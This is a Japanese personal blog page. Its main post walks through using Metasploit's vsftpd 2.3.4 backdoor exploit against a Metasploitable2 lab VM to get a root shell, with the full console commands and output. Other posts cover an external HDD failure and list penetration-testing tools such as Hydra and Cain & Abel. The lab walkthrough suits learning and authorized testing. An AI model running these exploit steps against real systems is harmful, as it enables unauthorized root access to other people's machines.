開発日誌

日々の中で得た知識を書き溜めていくブログです

Metasploitを試してみる

前回のペネトレーションテストの続きとしてMetasploitを試してみます。

事前準備

Kali Linuxをインストールします。
Official Kali Linux Downloads | Kali Linux

Metasploitの攻撃対象となるLinuxを立ち上げておきます。
Metasploitable - Browse /Metasploitable2 at SourceForge.net

Metasploitの起動

Kali Linux上でTerminalを起動し、以下のコマンドでMetasploitを起動します。

root@kali:~# msfconsole

Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.14.10-dev                         ]
+ -- --=[ 1639 exploits - 944 auxiliary - 289 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

vsftpdの脆弱性をついたroot権限の取得

vsftpdのExploitを検索してみます。

root@kali:~# search vsftpd
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

攻撃するために必要な情報を設定します。

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)

攻撃対象のIPアドレスをRHOSTに設定します。

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.0.5
RHOST => 192.168.0.5

再度、optionsを表示してRHOSTが設定されていることを確認。

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.0.5      yes       The target address
   RPORT  21               yes       The target port (TCP)

攻撃をしてみます。

msf exploit(vsftpd_234_backdoor) > run

[*] 192.168.0.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.5:21 - USER: 331 Please specify the password.
[+] 192.168.0.5:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.5:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.0.7:41265 -> 192.168.0.5:6200) at 2017-07-17 10:35:37 -0400

idコマンドを叩くとroot権限が取得できていることがわかります。

id
uid=0(root) gid=0(root)

こんなに簡単にroot権限が取得できるとは・・・。
これから色々と弄っていきます。

参考

qiita.com

サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考

サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考

外付けHDDが壊れました・・・

昨日、外付けHDDがMacで認識しなくなったので、修復作業を行ってました。

認識しなくなった経緯としては、MacのTime Machine用に外付けHDDを使っていたのですが、そもそもバックアップから復元する機会がなく、外付けHDDを他のことに使おうと思い立ちました。他にも写真や音楽なども入っていたのでフォーマットはせずにファイルを選択して削除していきました。

ところが、ゴミ箱からファイルを削除しようとしても一向に削除が終わりません。2時間以上経っても終わりません。 一旦諦めて、.Trashesの中を直接rmで削除しました。ただ、こちらも終わらないので途中でキャンセルしました。

そうしたら、外付けHDDがFinder上に表示されなくなりました。 Macのシステムレポート上のUSBでは認識されているようなのですが・・・。 ディスクユーティリティから修復を試みましたが、ディスクを読み込み中のまま中々ディスクが表示されません。 もう諦めかけたとき、fsckコマンドの存在を知りました。

さっそく、Command+SでMacをシングルユーザモードで起動して/sbin/fsck -fy /dev/disk2s2で修復を試みました。 こちらの記事を見ると私が使用している2TBのUSB2.0では18時間かかるとのことで、夜に仕掛けて無事に修復されることを祈りながら眠りにつきました。

USB2.0ストレージHDD 2TBのfsck所要時間 | nexia inc

朝起きてみると、まだ修復は終わってませんでしたが、修復されてそうなログがちらほら出力されていたので、安心して会社に行きました。

ところが、家に帰ってみると外付けHDDからブー、ブーと異音が鳴り響いていました。

本日の雷雨で停電したっぽいですorz

今までの思い出の写真や音楽は全て無になりましたorz

本日の教訓はRAIDを組みましょう!です。

ペネトレーションテスト

最近、社内でセキュリティ関連の話題が多いので「ハッカーの学校」を読みました。 けっこー知らないツールが載っていて、予想以上に楽しめる内容でした。 その中でも私が特に気になったツールがこちらです。

Kali Linux

ペネトレーション用の様々なツールが最初からインストールされているLinuxになります。 公式サイトからVirtual Box等のイメージをダウンロードできるので手軽に試すことができます。

https://www.kali.org/

Zenmap

サーバのポートをスキャンするツールです。 開放されているポートを調べることができます。

Zenmap - Official cross-platform Nmap Security Scanner GUI

Hydra(ヒュドラ

オンライン向けのパスワードクラッカーツールです。

THC Hydra – SecTools Top Network Security Tools

Cain & Abel

オフライン向けのパスワードクラッカーツールです。

oxid.it - Cain & Abel

NetCraft

URLから様々な情報を確認できるサイトです。 OS、言語、フレームワーク等の情報が見れます。

Netcraft | Internet Research, Anti-Phishing and PCI Security Services

Metasploit

デファクト?のペネトレーションテストツールです。 GUI版はArmitageです。

Penetration Testing Software | Metasploit

NetCat

TCP/UDPを用いてデータの書き換えるツールです。

The GNU Netcat -- Official homepage

なお、弄る際は自己責任で。

ハッカーの学校

ハッカーの学校